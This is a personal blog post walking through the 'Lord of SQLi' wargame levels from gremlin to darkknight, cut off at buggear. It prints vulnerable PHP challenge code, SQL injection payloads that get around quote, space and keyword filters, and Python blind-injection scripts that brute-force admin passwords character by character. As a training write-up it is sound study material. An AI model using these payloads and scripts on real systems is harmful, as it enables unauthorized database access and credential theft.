<!doctype html>
<html lang="en-us">
  <head>
    <title>Lord of Sqli // D@rkmod3</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.96.0" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="D@rkmod3" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.8751543c8da766b689e79176cbd58ed78b7c1b5ffde4bc716e1da317e5caccbe.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Lord of Sqli"/>
<meta name="twitter:description" content="Day 1  Grimlin cobolt goblin orc  Grimlin To win this game, we force $result[&#39;id&#39;] return any value.
 $query = &#34;select id from prob_gremlin where id=&#39;{$_GET[id]}&#39; and pw=&#39;{$_GET[pw]}&#39;&#34;; I use &#39; to escape id param and add a sql command:
 id=&#39;or(1)--&#43;-  # ... where id=&#39;&#39; or(1)-- &#43;-and pw=  id=1&#39; union select &#39;vietcaijvaodaycungduoc&#39; --&#43;-  # try with union, huh!  # ... many ways Cobolt Same with Grimlin we must do some trick to force $result[&#39;id&#39;] = &#39;admin&#39;"/>

    <meta property="og:title" content="Lord of Sqli" />
<meta property="og:description" content="Day 1  Grimlin cobolt goblin orc  Grimlin To win this game, we force $result[&#39;id&#39;] return any value.
 $query = &#34;select id from prob_gremlin where id=&#39;{$_GET[id]}&#39; and pw=&#39;{$_GET[pw]}&#39;&#34;; I use &#39; to escape id param and add a sql command:
 id=&#39;or(1)--&#43;-  # ... where id=&#39;&#39; or(1)-- &#43;-and pw=  id=1&#39; union select &#39;vietcaijvaodaycungduoc&#39; --&#43;-  # try with union, huh!  # ... many ways Cobolt Same with Grimlin we must do some trick to force $result[&#39;id&#39;] = &#39;admin&#39;" />
<meta property="og:type" content="article" />
<meta property="og:url" content="/posts/lord_of_sqli/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-09-15T00:00:00+00:00" />
<meta property="article:modified_time" content="2021-09-15T00:00:00+00:00" />



  </head>
  <body>
    <header class="app-header">
      <a href=""><img class="app-header-avatar" src="/avatar.png" alt="D@rkmod3" /></a>
      <h1>D@rkmod3</h1>
      <p>Hack or hacked</p>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Lord of Sqli</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Sep 15, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          7 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h1 id="day-1">Day 1</h1>
<ul>
<li>Grimlin</li>
<li>cobolt</li>
<li>goblin</li>
<li>orc</li>
</ul>
<h3 id="grimlin">Grimlin</h3>
<p>To win this game, we force <code>$result['id']</code> return any value.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span> $query <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;select id from prob_gremlin where id=&#39;</span><span style="color:#e6db74">{</span>$_GET[<span style="color:#a6e22e">id</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39; and pw=&#39;</span><span style="color:#e6db74">{</span>$_GET[<span style="color:#a6e22e">pw</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;&#34;</span>;
</span></span></code></pre></div><p>I use <code>'</code> to escape id param and add a sql command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>    id<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;or(1)--+-</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># ... where id=&#39;&#39; or(1)-- +-and pw=</span>
</span></span><span style="display:flex;"><span>    id<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span><span style="color:#e6db74">&#39; union select &#39;</span>vietcaijvaodaycungduoc<span style="color:#e6db74">&#39; --+-</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># try with union, huh!</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># ... many ways</span>
</span></span></code></pre></div><h3 id="cobolt">Cobolt</h3>
<p>Same with <code>Grimlin</code> we must do some trick to force <code>$result['id'] = 'admin'</code></p>
<p>Focus the php code below:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span>$query <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;select id from prob_cobolt where id=&#39;</span><span style="color:#e6db74">{</span>$_GET[<span style="color:#a6e22e">id</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39; and pw=md5(&#39;</span><span style="color:#e6db74">{</span>$_GET[<span style="color:#a6e22e">pw</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;)&#34;</span>; 
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span>($result[<span style="color:#e6db74">&#39;id&#39;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;admin&#39;</span>) <span style="color:#a6e22e">solve</span>(<span style="color:#e6db74">&#34;cobolt&#34;</span>);
</span></span></code></pre></div><p>Clearly <code>union select</code> is a good choice to control value return from id, so the payload look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>    id<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;a&#39;</span> <span style="color:#66d9ef">union</span> <span style="color:#66d9ef">select</span> <span style="color:#e6db74">&#39;admin&#39;</span> <span style="color:#75715e">-- and pw=md5(&#39;&#39;) Here id will return &#34;admin&#34; because &#34;pw&#34; is commented
</span></span></span></code></pre></div><h3 id="goblin">Goblin</h3>
<p>Focus the php code below:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span>$query <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;select id from prob_goblin where id=&#39;guest&#39; and no=</span><span style="color:#e6db74">{</span>$_GET[<span style="color:#a6e22e">no</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>; 
</span></span><span style="display:flex;"><span>$result <span style="color:#f92672">=</span> <span style="color:#f92672">@</span><span style="color:#a6e22e">mysqli_fetch_array</span>(<span style="color:#a6e22e">mysqli_query</span>($db,$query)); 
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span>($result[<span style="color:#e6db74">&#39;id&#39;</span>]) <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;&lt;h2&gt;Hello </span><span style="color:#e6db74">{</span>$result[<span style="color:#a6e22e">id</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&lt;/h2&gt;&#34;</span>; 
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span>($result[<span style="color:#e6db74">&#39;id&#39;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;admin&#39;</span>) <span style="color:#a6e22e">solve</span>(<span style="color:#e6db74">&#34;goblin&#34;</span>);
</span></span></code></pre></div><p>Here the mission is force id return &lsquo;admin&rsquo;, notice the code added <code>@mysqli_fetch_array</code> which return array of values.</p>
<p>Continue view the code, it filter some little bit painful sql operator.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">preg_match</span>(<span style="color:#e6db74">&#39;/prob|_|\.|\(\)/i&#39;</span>, $_GET[<span style="color:#a6e22e">no</span>])) <span style="color:#66d9ef">exit</span>(<span style="color:#e6db74">&#34;No Hack ~_~&#34;</span>); 
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">preg_match</span>(<span style="color:#e6db74">&#39;/\&#39;|\&#34;|\`/i&#39;</span>, $_GET[<span style="color:#a6e22e">no</span>])) <span style="color:#66d9ef">exit</span>(<span style="color:#e6db74">&#34;No Quotes ~_~&#34;</span>); 
</span></span></code></pre></div><p>Nah, i&rsquo;m good. It doesn&rsquo;t make it hard for me, here i have 2 idea to solve this challenge.</p>
<ul>
<li>solution 1 : Use char() to make &lsquo;admin&rsquo; string</li>
<li>solution 2 : Add one condition to find <code>no</code> value of <code>admin</code></li>
<li>solution 3 : Bruteforce to find <code>no</code> value of <code>admin</code></li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- solution 1
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#f92672">?</span><span style="color:#66d9ef">no</span><span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> <span style="color:#66d9ef">union</span> <span style="color:#66d9ef">select</span> char(<span style="color:#ae81ff">97</span>,<span style="color:#ae81ff">100</span>,<span style="color:#ae81ff">109</span>,<span style="color:#ae81ff">105</span>,<span style="color:#ae81ff">110</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">-- solution 2
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#f92672">?</span><span style="color:#66d9ef">no</span><span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> <span style="color:#66d9ef">or</span> <span style="color:#66d9ef">no</span> <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">-- When we use payload above, the condition of &#39;where&#39; command is 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">where</span> id<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;guest&#39;</span> <span style="color:#66d9ef">and</span> <span style="color:#66d9ef">no</span><span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> <span style="color:#66d9ef">or</span> <span style="color:#66d9ef">no</span> <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">-- Equivelent to `where false or no&gt; 1`
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- solution 3 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- Use burp intruder to brute force `no` from 1-100, i found value `no` of admin is 2
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- so this payload look like: 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#f92672">?</span><span style="color:#66d9ef">no</span><span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> <span style="color:#66d9ef">or</span> <span style="color:#66d9ef">no</span><span style="color:#f92672">=</span><span style="color:#ae81ff">2</span>
</span></span></code></pre></div><h3 id="orc">orc</h3>
<p>The level is increasing, but i&rsquo;ll never give up xD))</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span> 
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">include</span> <span style="color:#e6db74">&#34;./config.php&#34;</span>; 
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">login_chk</span>(); 
</span></span><span style="display:flex;"><span>  $db <span style="color:#f92672">=</span> <span style="color:#a6e22e">dbconnect</span>(); 
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">preg_match</span>(<span style="color:#e6db74">&#39;/prob|_|\.|\(\)/i&#39;</span>, $_GET[<span style="color:#a6e22e">pw</span>])) <span style="color:#66d9ef">exit</span>(<span style="color:#e6db74">&#34;No Hack ~_~&#34;</span>); 
</span></span><span style="display:flex;"><span>  $query <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;select id from prob_orc where id=&#39;admin&#39; and pw=&#39;</span><span style="color:#e6db74">{</span>$_GET[<span style="color:#a6e22e">pw</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;&#34;</span>; 
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;&lt;hr&gt;query : &lt;strong&gt;</span><span style="color:#e6db74">{</span>$query<span style="color:#e6db74">}</span><span style="color:#e6db74">&lt;/strong&gt;&lt;hr&gt;&lt;br&gt;&#34;</span>; 
</span></span><span style="display:flex;"><span>  $result <span style="color:#f92672">=</span> <span style="color:#f92672">@</span><span style="color:#a6e22e">mysqli_fetch_array</span>(<span style="color:#a6e22e">mysqli_query</span>($db,$query)); 
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span>($result[<span style="color:#e6db74">&#39;id&#39;</span>]) <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;&lt;h2&gt;Hello admin&lt;/h2&gt;&#34;</span>; 
</span></span><span style="display:flex;"><span>   
</span></span><span style="display:flex;"><span>  $_GET[<span style="color:#a6e22e">pw</span>] <span style="color:#f92672">=</span> <span style="color:#a6e22e">addslashes</span>($_GET[<span style="color:#a6e22e">pw</span>]); 
</span></span><span style="display:flex;"><span>  $query <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;select pw from prob_orc where id=&#39;admin&#39; and pw=&#39;</span><span style="color:#e6db74">{</span>$_GET[<span style="color:#a6e22e">pw</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;&#34;</span>; 
</span></span><span style="display:flex;"><span>  $result <span style="color:#f92672">=</span> <span style="color:#f92672">@</span><span style="color:#a6e22e">mysqli_fetch_array</span>(<span style="color:#a6e22e">mysqli_query</span>($db,$query)); 
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span>(($result[<span style="color:#e6db74">&#39;pw&#39;</span>]) <span style="color:#f92672">&amp;&amp;</span> ($result[<span style="color:#e6db74">&#39;pw&#39;</span>] <span style="color:#f92672">==</span> $_GET[<span style="color:#e6db74">&#39;pw&#39;</span>])) <span style="color:#a6e22e">solve</span>(<span style="color:#e6db74">&#34;orc&#34;</span>); 
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">highlight_file</span>(<span style="color:#66d9ef">__FILE__</span>); 
</span></span><span style="display:flex;"><span><span style="color:#75715e">?&gt;</span><span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>The challenge have 2 part</p>
<ul>
<li>part 1: force sql command to return any value</li>
<li>part 2: brute force to get exactly password</li>
</ul>
<p>Part 1:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>    <span style="color:#f92672">?</span>pw<span style="color:#f92672">=</span><span style="color:#e6db74">&#39; union select &#39;</span>a<span style="color:#e6db74">&#39;
</span></span></span></code></pre></div><p>OK we done part 1, but wait the function addslashes is used.
It means that we can&rsquo;t use quote.
In oder to <code>$result['pw'] == $_GET['pw']</code> we only one way is brute force password.
Notice that, if we inject a true condition, it will return string &lsquo;Hello admin&rsquo;.
Nice, exploit &hellip;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> requests
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> string
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># ?pw=&#39; or length(pw) &gt; 8 or &#39; -- I extract length of pw is 8</span>
</span></span><span style="display:flex;"><span>pw <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
</span></span><span style="display:flex;"><span>session <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;abc...&#39;</span>
</span></span><span style="display:flex;"><span>cookie <span style="color:#f92672">=</span> { <span style="color:#e6db74">&#39;PHPSESSID&#39;</span> : <span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">{</span>session<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;</span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">9</span>):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> string<span style="color:#f92672">.</span>digits <span style="color:#f92672">+</span> string<span style="color:#f92672">.</span>ascii_lowercase:
</span></span><span style="display:flex;"><span>        payload <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;pw&#34;</span> : <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#39; or substr(pw,</span><span style="color:#e6db74">{</span>i<span style="color:#e6db74">}</span><span style="color:#e6db74">,1)=&#39;</span><span style="color:#e6db74">{</span>c<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(url, params<span style="color:#f92672">=</span>payload, cookies<span style="color:#f92672">=</span>cookie)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;Hello admin&#34;</span> <span style="color:#f92672">in</span> r<span style="color:#f92672">.</span>text:
</span></span><span style="display:flex;"><span>            pw <span style="color:#f92672">+=</span> c
</span></span><span style="display:flex;"><span>            print(pw)
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">break</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#pw=095a9852</span>
</span></span></code></pre></div><hr>
<h2 id="day-2">Day 2</h2>
<ul>
<li>wolfman</li>
<li>darkelf</li>
<li>orge</li>
<li>troll</li>
</ul>
<h3 id="wolfman">wolfman</h3>
<p>It is a beautiful day, I continue to try challenge.
Review the code, I see it filter space. My mission is bypass it, and force the id return <code>admin</code>.
Learn from previous challenge, <code>union</code> is command helpful.
With <code>space</code> we can replace by comment syntax <code>/**/</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>    <span style="color:#66d9ef">select</span> id <span style="color:#66d9ef">from</span> prob_wolfman <span style="color:#66d9ef">where</span> id<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;guest&#39;</span> <span style="color:#66d9ef">and</span> pw<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;&#39;</span><span style="color:#66d9ef">union</span><span style="color:#75715e">/**/</span><span style="color:#66d9ef">select</span><span style="color:#75715e">/**/</span><span style="color:#e6db74">&#39;admin&#39;</span>
</span></span></code></pre></div><h3 id="darkelf">darkelf</h3>
<p>Nothing special filter, continue use <code>wolfman</code> payload</p>
<h3 id="orge">orge</h3>
<p>It same to <a href="#orc">orc</a> challenge, author add filters <code>or</code>,<code>and</code>.
we just need replace <code>or</code> with <code>||</code> and <code>and</code> with <code>&amp;&amp;</code></p>
<h3 id="troll">troll</h3>
<p>Easy challenge :)), notice that pattern of <code>preg_match</code> is not have flag <code>i</code> (case insensitive).
It means we can use &lsquo;Admin&rsquo; instead of &lsquo;admin&rsquo;</p>
<pre tabindex="0"><code>?id=Admin
</code></pre><hr>
<h2 id="day-3">Day 3</h2>
<ul>
<li>vampire</li>
<li>skeleton</li>
<li>golem</li>
<li>darkknight</li>
</ul>
<h3 id="vampire">vampire</h3>
<p>I wake up at 6 o&rsquo;clock and feel so full of energy, have breakfast and play CTF :)</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#a6e22e">str_replace</span>(<span style="color:#e6db74">&#34;admin&#34;</span>,<span style="color:#e6db74">&#34;&#34;</span>,$_GET[<span style="color:#a6e22e">id</span>]);
</span></span></code></pre></div><p>This chall replace &lsquo;admin&rsquo; string, it not hard to bypass it.
Because <code>str_replace</code> function is not recursive, so you can write <code>adadminmin</code>, and when it replace <code>admin</code> it becomes to <code>ad</code>admin<code>min</code>.</p>
<p>So the payload will be:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#f92672">?</span>id<span style="color:#f92672">=</span>adadminmin
</span></span></code></pre></div><h3 id="skeleton">skeleton</h3>
<p>Use <a href="#cobolt">Cobolt</a> payload</p>
<h3 id="golem">golem</h3>
<p>Use <a href="#orc">orc</a> idea, but replace <code>or</code> by <code>||</code>; <code>and</code> by <code>&amp;&amp;</code>.
Author add filter <code>substr</code> and <code>=</code> so i think a couple of hours, i found <code>like</code> is useful to replace <code>=</code>.</p>
<p>Nice, but how use it?</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">select</span> id <span style="color:#66d9ef">from</span> prob_golem <span style="color:#66d9ef">where</span> id<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;guest&#39;</span> <span style="color:#66d9ef">and</span> pw<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;&#39;</span> <span style="color:#f92672">||</span> id <span style="color:#66d9ef">like</span> <span style="color:#e6db74">&#39;admin&#39;</span> <span style="color:#f92672">&amp;&amp;</span> pw <span style="color:#66d9ef">like</span> <span style="color:#e6db74">&#39;%&#39;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">-- return hello admin
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">select</span> id <span style="color:#66d9ef">from</span> prob_golem <span style="color:#66d9ef">where</span> id<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;guest&#39;</span> <span style="color:#66d9ef">and</span> pw<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;&#39;</span> <span style="color:#f92672">||</span> id <span style="color:#66d9ef">like</span> <span style="color:#e6db74">&#39;admin&#39;</span> <span style="color:#f92672">&amp;&amp;</span> pw <span style="color:#66d9ef">like</span> <span style="color:#e6db74">&#39;7%&#39;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">-- return hello admin
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">select</span> id <span style="color:#66d9ef">from</span> prob_golem <span style="color:#66d9ef">where</span> id<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;guest&#39;</span> <span style="color:#66d9ef">and</span> pw<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;&#39;</span> <span style="color:#f92672">||</span> id <span style="color:#66d9ef">like</span> <span style="color:#e6db74">&#39;admin&#39;</span> <span style="color:#f92672">&amp;&amp;</span> pw <span style="color:#66d9ef">like</span> <span style="color:#e6db74">&#39;7a%&#39;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">-- return not anything
</span></span></span></code></pre></div><p>My code to solve this challenge:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> requests
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> string
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># ?pw=&#39; || (id like (&#39;admin&#39;) &amp;&amp; length(pw) &gt; 8) || &#39; -- I extract length of pw is 8</span>
</span></span><span style="display:flex;"><span>pw <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
</span></span><span style="display:flex;"><span>session <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;qckem3eou6njaopue0repj1g4l&#39;</span>
</span></span><span style="display:flex;"><span>cookie <span style="color:#f92672">=</span> { <span style="color:#e6db74">&#39;PHPSESSID&#39;</span> : <span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">{</span>session<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;</span>}
</span></span><span style="display:flex;"><span>req <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>session()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">9</span>):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> string<span style="color:#f92672">.</span>digits <span style="color:#f92672">+</span> string<span style="color:#f92672">.</span>ascii_lowercase:
</span></span><span style="display:flex;"><span>        payload <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;pw&#34;</span> : <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#39; || id like &#39;admin&#39; &amp;&amp; pw like &#39;</span><span style="color:#e6db74">{</span>pw<span style="color:#f92672">+</span>c<span style="color:#e6db74">}</span><span style="color:#e6db74">%&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        r <span style="color:#f92672">=</span> req<span style="color:#f92672">.</span>get(url, params<span style="color:#f92672">=</span>payload, cookies<span style="color:#f92672">=</span>cookie)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;Hello admin&#34;</span> <span style="color:#f92672">in</span> r<span style="color:#f92672">.</span>text:
</span></span><span style="display:flex;"><span>            pw <span style="color:#f92672">+=</span> c
</span></span><span style="display:flex;"><span>            print(pw)
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">break</span>
</span></span></code></pre></div><h3 id="darkknight">darkknight</h3>
<p>Use <a href="#golem">golem</a> idea.
i replace <code>''</code> by <code>char()</code> , <code>substring()</code> by <code>left()</code>.</p>
<p>Many ways, huh!</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#f92672">?</span><span style="color:#66d9ef">no</span><span style="color:#f92672">=</span><span style="color:#ae81ff">0</span><span style="color:#f92672">||</span>(id <span style="color:#66d9ef">like</span> char(<span style="color:#ae81ff">97</span>,<span style="color:#ae81ff">100</span>,<span style="color:#ae81ff">109</span>,<span style="color:#ae81ff">105</span>,<span style="color:#ae81ff">110</span>) <span style="color:#f92672">&amp;&amp;</span> <span style="color:#66d9ef">left</span>(pw,<span style="color:#ae81ff">8</span>) <span style="color:#66d9ef">like</span> char(<span style="color:#ae81ff">48</span>,<span style="color:#ae81ff">98</span>,<span style="color:#ae81ff">55</span>,<span style="color:#ae81ff">48</span>,<span style="color:#ae81ff">101</span>,<span style="color:#ae81ff">97</span>,<span style="color:#ae81ff">49</span>,<span style="color:#ae81ff">102</span>))
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>   <span style="color:#f92672">=&gt;</span> pw <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>b70ea1f
</span></span></code></pre></div><hr>
<h2 id="day-4">Day 4</h2>
<ul>
<li>buggear</li>
<li>giant</li>
<li>assassin</li>
<li>succubus</li>
</ul>
<h3 id="buggear">buggear</h3>
<p>Some filter is added.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>    substr,ascii,<span style="color:#f92672">=</span>,<span style="color:#66d9ef">or</span>,<span style="color:#66d9ef">and</span>, ,<span style="color:#66d9ef">like</span>,<span style="color:#ae81ff">0</span>x
</span></span></code></pre></div><p>I search gg and find a function <code>instr</code>.
This function has 2 parameters <code>instr(a,b)</code> and return <code>Match Position</code></p>
